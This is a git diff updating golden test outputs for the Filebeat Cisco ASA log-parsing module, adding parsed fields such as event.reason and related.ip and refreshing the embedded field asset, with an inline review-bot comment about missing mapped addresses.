"cisco.asa.webvpn.group_name": "VPN5Policy", "event.action": "firewall-rule", "event.category": [ "network" @@ -3071,7 +3247,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-722051: Group some-policy User testuser IP 8.8.8.8 IPv4 Address 8.8.4.4 IPv6 address 2001:4860:4860::8888 assigned to session", + "event.original": "%ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session", "event.severity": 4, "event.timezone": "-02:00", "event.type": [ 
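Review bot: In the three 302022 events added by the `@@ -1603,6 +1627,156 @@` hunk, `event.original` carries the mapped addresses `(8.8.8.5/38540)` and `(8.8.8.8/10051)`, but `related.ip` omits them and no `cisco.asa.mapped_*` field is set. Other hunks in this same file add mapped addresses to `related.ip` (for example on the 302020 events), so an analyst pivoting on a translated address would find those events and miss the 302022 ones. This file is golden output, so the change presumably belongs in the 302022 pattern of the ingest pipeline, which is outside this view.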
@@ -3090,22 +3266,15 @@ "dev01" ], "related.ip": [ - "8.8.8.8" + "192.168.50.3" ], "related.user": [ - "testuser" + "john" ], "service.type": "cisco", - "source.address": "8.8.8.8", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "8.8.8.8", - "source.user.name": "testuser", + "source.address": "192.168.50.3", + "source.ip": "192.168.50.3", + "source.user.name": "john", "tags": [ "cisco-asa", "forwarded" @@ -3113,6 +3282,7 @@ }, { "cisco.asa.message_id": "716002", + "cisco.asa.webvpn.group_name": "another-policy", "event.action": "firewall-rule", "event.category": [ "network" @@ -3122,7 +3292,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", - "event.reason": "User Requested.", + "event.reason": "User Requested", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -3132,7 +3302,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 9683, + "log.offset": 9680, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3164,6 +3334,7 @@ }, { "cisco.asa.message_id": "716002", + "cisco.asa.webvpn.group_name": "another-policy", "event.action": "firewall-rule", "event.category": [ "network" @@ -3173,7 +3344,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", - "event.reason": "Idle timeout.", + "event.reason": "Idle timeout", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ 
@@ -3183,7 +3354,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 9810, + "log.offset": 9807, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3240,7 +3411,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "error", - "log.offset": 9937, + "log.offset": 9934, "network.iana_number": 6, "network.transport": "tcp", "observer.hostname": "dev01", diff --git a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json index bcd775e4e1e..7dde207d2b0 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json @@ -5,6 +5,7 @@ "cisco.asa.message_id": "302016", "cisco.asa.source_interface": "Outside", "cisco.asa.source_username": "(LOCAL\\Elastic)", + "cisco.asa.termination_user": "zzzzzz", "destination.address": "10.233.123.123", "destination.ip": "10.233.123.123", "destination.port": 53, diff --git a/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json index ea4dcecdef3..355b9450453 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json @@ -133,6 +133,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", 
@@ -193,6 +194,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -253,6 +255,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -313,6 +316,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -373,6 +377,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -433,6 +438,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", 
@@ -493,6 +499,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -553,6 +560,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -613,6 +621,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -673,6 +682,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -733,6 +743,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", 
@@ -793,6 +804,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -853,6 +865,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -913,6 +926,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -973,6 +987,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -1033,6 +1048,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:45.000Z", "event.timezone": "-02:00", 
@@ -1093,6 +1109,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "event.reason": "SYN Timeout", "event.severity": 6, "event.start": "2018-10-10T14:34:26.000Z", "event.timezone": "-02:00", @@ -2791,6 +2808,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -3781,6 +3799,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -4509,6 +4528,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:29:31.000Z", "event.timezone": "-02:00", @@ -4569,6 +4589,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", diff --git a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json index 70df45cbf91..e03c1a5c403 100644 
--- a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json @@ -36,6 +36,9 @@ "target.destination.hostname.local", "Prod-host.name.addr" ], + "related.ip": [ + "10.0.55.66" + ], "service.type": "cisco", "source.domain": "Prod-host.name.addr", "source.nat.ip": "10.0.55.66", @@ -46,9 +49,10 @@ }, { "@timestamp": "2011-06-04T21:59:52.000-02:00", + "cisco.asa.icmp_code": 0, + "cisco.asa.icmp_type": 8, "cisco.asa.mapped_source_ip": "192.0.2.134", "cisco.asa.message_id": "302021", - "cisco.asa.source_username": "type", "destination.address": "192.0.2.15", "destination.ip": "192.0.2.15", "event.action": "flow-expiration", diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json index b2c1d4cb876..34f1549272a 100644 --- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json @@ -451,6 +451,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -554,7 +555,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -812,7 +814,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -2254,6 +2257,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:01:31.000Z", "event.timezone": "-02:00", 
@@ -2308,6 +2312,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2362,6 +2367,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2667,6 +2673,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-10T10:01:54.000Z", "event.timezone": "-02:00", @@ -3335,6 +3342,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3393,6 +3401,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", @@ -3450,6 +3459,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index 4d465edfa97..f3ece1f34c2 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go 
@@ -19,5 +19,5 @@ func init() { // AssetCisco returns asset data. // This is the base64 encoded gzipped contents of module/cisco. func AssetCisco() string { - return "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" + return "eJzs/W1zGzmSII6/30+B64j/2e5Q09Pubu9N3+5eaCX1tG5st9ay3fu/mIgKEAWSGKOAMoAixf70v0AC9cAqFElRQEneHb9w2BKZyEwAiXzO79Bnuv0ZEaaJ/CeEDDOc/owu/H9zqolipWFS/Iz+7Z8QQuitzCtO0UIqtMIi50ws3ceRoGYj1WeU0zUjFHG51LN/QmjBKM/1z/8E37Z/vkMCF9SvOcNF2fwGIbMt6c9oqWTV/aminGJNf0ZzanDn5zld4IqbDJb4GS0w13Tn1wPs6z8dKkqsdEvE+dubBvP6T01BF0BNhGEF1QYXZSawkJoSKXK988maqBwb2vvFHgTtnw8r2sJHTKCrUpIV6izUYhlEjq6pMJldPmN5EKnPdLuRqv+7A3idI13N0fUlkgtkVtQtc4ZyWlKRW1ZK4X4GixzAMaeGErtSPPws3yzwGr8C8w1W1C9F82Mxiso0i1TLsmaNA7gQKQQlRqpsWcXG5i8fW3yadZD2e8jEQqoCWwDIwL04gCpcWkAzfP5PO2oCYaXw1uIJCwDWt1YiYENzi1kk9NcVF1ThOePMMBomYcGxMVTQBxBRI95briakwJwRJivtLtABnDXBYtZZPB7fL9tfW6xxfaE7fMewPJpTx25mmP3NGchUeoeLklMgSZeUsAUjKGcK9mgL2B9DGuEUh4maSxn43QGi/t19Ca0xryhiC0+CoDlaME7RBmsESyKpkJBHcd8DyCyA8KHhUizvh+eFrISxbAegDY5MINwy8T7IlUoSqnV8BBvADZK7B4SJJafunBx9nhuksVlFRzhniwVV9iTXjGRRkW/ub9ZI+Og0tDLCnQ+pUC5JVVBhdPPGPYwWIouyMlTNJn9/zpBmBeNYgUSUJeJ0TXnvHTxD88qgSrAv7h4XFTfMypvmYxrZB5+JteTrgw9+Qy29M1QJzDNWBkkd/PgIKmuY6PqmJrbempXUR28EJoat+/rjA2Thted7peA2UJGXkgmDmEZuqeNkYIOfV/4znOdqXNSc+oBy3lgXTBiqFpjQnSfevvL346y9O7Oc6VJqFvftvMCGLqVif+D6+bRr7T6M37ytL/E3ltHfXNgd/OYAyjWPLeFToY4bxgcUgBR0iUUxc7I5uk1QH/YGPJpjTXN7eLSsFKEIi9wCMkw4Blwf0ho9O2YFJmmUXsx5w/O35xeouV9HIkZGhMajIUa4rPKMSTKJ4toVCte/XcBZbRRS+wM41RotlCyOMBJa5PVKKpMlIeHWgu5+KAEhO1euxPZaTCdRavzjCQ1PAcupMMxsZ0X+UzwS3l7+hFZYrwLb8BAc9Qp/H/HQ/Hr+fXQsF4Dlq59eR8Xz1U+vT8QU3mysyIqtvck13aEFC9GvneQVDBA3zXmu13Qk9jwr93NI7KMh8XmfjorU9yE6JcZg8tkapJhxPcNlyRnB8dWrDmDnfu2gfnVXcskMulGANqs9xIe0hSAB8F+aZwU48eMRcYPNquYzvaOkMnjOwRDKOUdmhQ24iOr1vbbo7e35NkDkCdRZlbS2ouLuj4WMClpIta21tf7pop6CIz3lIfx1pUvvAhn3iT1Y+6zxdh6QzYoKhIXfGWvDPnxbplWKSgymSYRnhCol1WRO4dptAKseJZIcfvB3RmQe8fqCtwXwsHD9p+dMLHe0jOMxNStFsclWlTBMLGearqliZhtR9nuISFFdcVPLf7cususiRZdMG6rGHwB0AU549EZuvrtQzDCC+f0IY4LA85YpWlqjJq2nr5E4LZV2
i9zaJyJufzAR2kysqTZs6SNLCpPPEP/QujoU0hjDHmLuETG34Gq060X6gr7HfXD5WfXmNAp0VRRYxbwZDmBNhawMkQWtvXxxkVe0oDmLrA+9p0QWBRU5wIXwnqJa8rWLiXWjf1sEIh/eqONcl2OUxD7/LB+efn+c7DMVfyuoyDPDivBluH/+xO9WLehL1AUTmLM/aG7ZTrjUB7Wc0VNvsDLJ8bUaZxNdPUEfYyK3SrlUUT3yl00crYEPALVTkwtsyAr+M9Qpd3WcNiD39vrD+ytk7BEih8yC3pb4L8Uk8A3TpnZz7mDWl6SdK1GJex4lQ8kKglipUW/WeRj2XwubC2YUzfahe5oBEvJ9w1oea3R9+Uwf4OHXteWek/uRjs7Merkj+GmfWSzyjDNBZ1gtXRg87jt48eYaNaD77LzgssrRByexr3+78JqsMz0hp/AAi+dlluOdtEb00ONw1UZzJXeaaidY+k8DHrpETN3FIZyIuWfdXyBJEmS7z6S8PUe/MEU3mPP92ZTNYaNa4+UgV3F89/ayAXauwcTDRt6xzagKbkuTzFEtFuzuSDT8W/Yz0lTrvhq5F8ff4OeY+/UQXhiq0P/PInwsohC4zJqoeAzO3bpgaBtpr7W9BZcbtNd6bnMomyBqXNwuO9HZhyCoKk4z+88YSL3rJJueE0K1RhdSGCW5k8x2sa5iZK1fts+D29vdSlOVAlcL1+HFnK7mw+COnUdh2N3oydDshujvgWuBy5LmWX1lygCevR8eFDBGYaHde+B5d31TO1fvgYs1+o7m2t6c95NwHrU5w9ja9y2A7SCl7QRMRp1APUx25EvkjdxNALnPbnaxeqwt7WJ/7L528U6xuV2cDu6wt5Eg7y+OHgCqmcsjtNKiLgd4iebSCGosposFIzP0mwCZs6Zq+x2XmzNk/+qBK2ROFTb0DK3YcmUfG/i4/c8xZBHn+t/GoMyHEbbN8zdO2S+tyf0zWjNV6TP/mT59Rsm/Y3GGqCF76fGploEyiROp+ejTORu9B8jC8KbvxYSRooQilwAWkKZzPA7XF29vxotWdhYcxC5OX9CCOpbXI3SmESufbt511kY7a4d0AVxmihKpehUgBxF5gIaPtWZLQXN0eX6D+osHWdnai1nYXkyJrl8e2eU7NiWXy6WzGO015pJgjnCVM2N/s4+cmvz+I3gkDfd9JdvnsGU85MDASeGMCoN0BRrwouJ825wesZeKUrE143RJZ5Lf8wyfuBfgasWgWep2eatfkhUWy1pD9/qm5LkrGjmOCEE3T5AIQTeHiZhXSpuZnP+dkr4US3cpao+KWxbEPuCBNlgJJpZ7L7TDmE1zbLrYWiUAXV+ehK7PRM5UP0aQVPb49GeHLKCvKRVHYCvFgi0rRfPHQbhdv4P7YbTxevk4+OI1VXhJH8ToR0O+w+wAHZhzuem4I/ec8KLi2LA1zYisxHTCxEiDOSJ1sVQH9xUzGmkmiIvBemkDRX9WNa8jghSr/QQaqoquy2MS0s7Pz5uaZvCHKPqlArNq2UVoH94bOl+XYubqdO/lp3moHvk7nVsFwRXwAhWNW2dOrWWpkZH/1MfXuaUXpovNw93SvzBFS7mhqjYML+mCCk2fiK/6lw+XX5ev2iL8D1/1P3zV//BVf9W+avRRU3R1cet/NRPYzFj5Dxf2iS7sEDufsG+7Qbfz+3scgX/4vQ/jtHss+nz+h1f8H17xf3jFdxY86BXXlFSDhHy3XtCB1S7YW+493nhNH5h76+Giq/EKpf8invmUKN7XM7/XrE6F6H9bs5pJHdWsvv7t9oi+eU3YAgyPjLN76ApHKuBWq3FmjYW+9/IuMIEE/PuazrdXF/fbqHohZCTarBhZuXfJm/mKLqjS6HknLfoM3b57e3OGbv//t2dQZqhlD+xCKrN6MUPnLXDXjQthtMIq9w3v1ozQM4RRqaSRRPIzBK+Hq5xEctF/5qxdtdWGFkjLhbFAZujaoJwKaeiO3eUfV4Ir3fDe
fbWvGjgyZ4OD6OvOZ41pPOvdHrmmaqOYscJBVXRwXoebdHpDyO4RGraa2ayocrfL6w5ohTWaUyqQnGuqdnoMNWb7TkLlIWKGl28vKeN3C7AWeFdLHF99bP39bS8L3e9etW+Fe2TgfrDm8We6teZzpV14keDSVJ7/Cm+aiwNmNpEF1ZZoSMftgUbojVyiS2p1CRUmxMEalM6cSs5u601LWmTAHuHE3Pcs13VzLgNharlATGiDhanR0EEcAzUxxyB4qGLmQyeaaZdA2Hhximt3pnPyY/SOmt+ZEfYZ8Ls/GxyNhli9khXPkaBreDmbc1dipSl6Sw22qGHXW6Vd6vkbudQvbzD5TI1+MQB/CV2G+PasicJi9J46YeFOuOigOQsycmjuHcfJQ93lLmmpKAEb1WKS0wUT0AiJA1qu7r3AZRirQi+HtWYxT6Df47f+nl9ffu97NjrHWm0L1fVFmECehNsvNdgIoA4quP1pgc/Z7SixMoxUHCv4vt/Y2ejJGIA+6aSETsYA8vhJGd2S9bR78uofe7J/TwJVHZE25GHXV87/ngEh/W15Mtit8SlCLzlqijrd9yniZtmW6v4/DDNtsKEF7aUAPBHkIMkuIxwPmq08CfSoMIOy+ieB2CrQuuNJIMbEaYil1ZhqyfF0T1pO8SnSIy3bFtQFaWLZUCN6TcjODLRftNgM9JCBkvAwK6KnhwygH7Aixrk4cExOwkXR8aoE2efYNSAzEvtQgIP3Zh+ZQq2uBmGemv66E+OuUXshBbGPAzbyqVu2I+JmzdKKwy53L+wybFE3p/MH8o1cuhBPnURUiZwqcJZSL6gGpC/YHc2RppBbuPPl3TX0uMFSb8IA9oMNlmYTBqDvtSlDT2B8/9JpB3NA1z14cj8eDLIYkpzLX6U2XRHJ+yeynmbif6lDx6bjQ/p6+DvopH8Md/e33+8y9vpm/WNTqTJ23fvMHVBv5NfK3HW/Q2l09r7+78veQaA/iWzoywXnSOt6y3KE0ZKtqWicZF+vImCCM8oe3wLJn6Ly93VENEYdGrLcZop+SbDX3eAhbDDQ7asqr9zS6AYu0pn3ZhuMPmxLishggApYIZSZFVXo47Uw379GUqFfuMTmh1ft5AgfIIOamWETwSHdp6i7XzHdEAZNZ3xG8C8Ecw8nsY7rlb96B4NUG6wGNcjRtI6OROuQ3eXk9c2nHX0PQ5Vmf0tRndviHlGPNlQ40J35GVAeptiSQbmL+86utnKAD6n0rz2JEdc3n14HWBDOyUERWNBgNORyjNenPahDxfHU12dFcU7VJLHrX2EpdH35kCipw7cbLAUwp8VKn7STjZMsuZ8N14rWdatowUWxpsuF5Bwmx32NAthy7xFybuyZYxoRx7p6QmVHUX0j+2oL2sPoJ2jxFWT+VFTVQmpIdiukQPPtYNNQnblsAWpWlHzr98l+2LXcxWSFNMspev4nZFaqQq9++ukFFEBr6jsPF32/1y4nnoTyegQndCmFpulYQb6aU+EK4WufQlXMndCDseJBCOg5nss17TCDiWBmZS3etFEUF6P3h3w1x+aRWUVzVvX1tBiM+iakOTaOBbZAzPytevWn7/+snUh/WYIArZH+24Cav1l78A3eUoVeoStBcKkr32XWmpT3kush6A8MfgRyK0Or/PAK/asl9wz98AP6V0SkgsYusE1u0TP0P7n53/aDTKNdpnwT3EIh80Cd9hOxdcWGZgRzPsfkc1oN2CFXFwxg4yeHMt2Oi/E9dIKIwuHIYExLan0QBihiDhgDptpIZTVrsXVah/3FGnPmxjigEFLI9dG2LwyngDwMQjgueXH3Rgwgx4gF+uuwJ2w0sgtbLnH+VN45jw7S7A+KCmrUsLE7gpHP/Q+DLeye+1oI22cfm1ajdeOX7LbN0K9yY7dmaHMygaSyxpiR6DOl5QGmPYkX7ythmpshn61ZnuWpoq5NR/QlFVCorKGsqnJ2tLcL10yZCnNrtO/43kXAxeGHlLvau3YS
vr/q15dIWWmtwaECTMNqSU3zsYOc0CpR0tOjc6Juk7CPEypJKGgo+Nv5Tu9pIQ1Ft/681x2h5tsxQYmgwYsLxHwFgRe/UqZLzlJmNjxpc16zgdr/JHQzK3MTnne4dfYNqMs0/amrrRb/hPzXiDA68bJgg5FqE8ToYWCrVOjm4vzG676+KJcVbihI4In86tIgqqfh/vCdMcAQH7YYRM6VumvKV+1XWoPd6Tlgmc/Qq59eow3wvaBYwGyaoK8AnPqgJrX+I7ShynV6RNBZBWuDpOiVi+wy8dHVxK+biYG7miJs63n3u1Q5MM41hyArIblcbvuBuAVTAy0WoZ8QWWGFiXFMtJd6C/iD01ygSvicHr7jMx+tqI1d0O0C9SmDCHtil2BRFG42bx1GUHgzKtNAsvbUSkxAY3UxCj9dGklCoJMpQNQGixyrHAmpCjcDMGDLqyLIn9xnOZzMIlnNB0/SvZjUYt0g85KzBQWKAwa+pkSKfETBbrc70yaln2UPQUwQWZScmuABGHWiYlDgjWI9MdipN1PmkQ7yrV07eJzHjvLuyRw9foUUZhVpm9r61Fg5L22WU/5IjL8SeQq2W5B/SJG628IesWhXr1VMl177oc/hgYhKdqPPkaF3xl8+tKZKd8op8n15YIH9fehh21Ici8y2TI9IldPgENo4p9gn2fhnSjcr1jpGnWnTfLAbXx++VkoWM4BaQVG+JlRgxaRT64uKG/adYVQhXJa8rn5pe9kUWOBlqDQXIQ7hnZ22PnUPL8TMM43kRrjImMFF2fcMeoyh5amSw+QjZjQiK2atG5lTPUNvK23ATOoCdQMLR/JysaEnbtJeAbZYWLzXdApNCDa5XtDxDlpBUUHcgcACpuuuWW41GzgPYUF2WwuyDz3mhYm8K5majMJ2P10s6M6eRGb4tu57ZSToaxYp1w9zr2804qaPunDOrDRu5NlssGSTTiar2BKoGChyD4XY8D/2VQEN8ktFq8mOkj3d7hS18nGDNQIk8pFzA8h9H5upEZWCHYYmkGnLwiR4fZdFClxhFG58oCm05zKmKNoF+io61AS6UucVeRwTsmc+Bt+YwXN5rzfnVLF5SK6dEixoH4heN4TYjiBMBkp8DMVaVzx12GnEipKVIbKgLx0OjfECWdmDBpjIngvHgh0DcuSA0DUddCCejLB6dV8E2Ins7HP5pC1eHPQOdK90U+lioUHcqaSELVhr+IS1W989f+RMeV05fTZTYAMaFyPL24KJ2kWV+yBLEG9vNk+1CZ92rfSuJSgV+u3Wp8YyXScE9P1qyPeF7c2sQDtVkrqUmkUUHEedLTCnRe46TEEqf313R7vwVNwMe5Q/ligSVUEVI/eVRUHaJqhi20NYt5KtuRlOLLn7PSBtTUUulU+Y3UuZnP/9EbrX1KHdQCf5LmLpa8EH7LYSdD9iTtKn7FX3zfBC+qp/L2a8l2uFm9xiIQ3CMJnDIhlOoOVymdWJKo8i1OuDeG+hPkXPlB3Z9xdIt4Ku1btDPbtYlZIzsk19e/bIhRtAwDfXFnw7IpeD860SM/B9xSkgFhanUhh6l1pjbRC6Fs5f1/ZDxXmu7V/wqMJAQ0Ao1ADmwOPsZsFm/aG0CWTBWOCyHjzb9ArBxig2rwztSIhhjr4fY2u19e7zFxYduuwPbXu41eIGGk9/c8AQ7OcX+enKHf0tYNw2syvqhoO6zflSa6pm6Ja2UyJmeEmhlbfPdF9IVeMwgF2DcXo7cVMm3Pc7fSukQnMlN/Z39U+9runMrtF+0tf5DVYmtpuuAR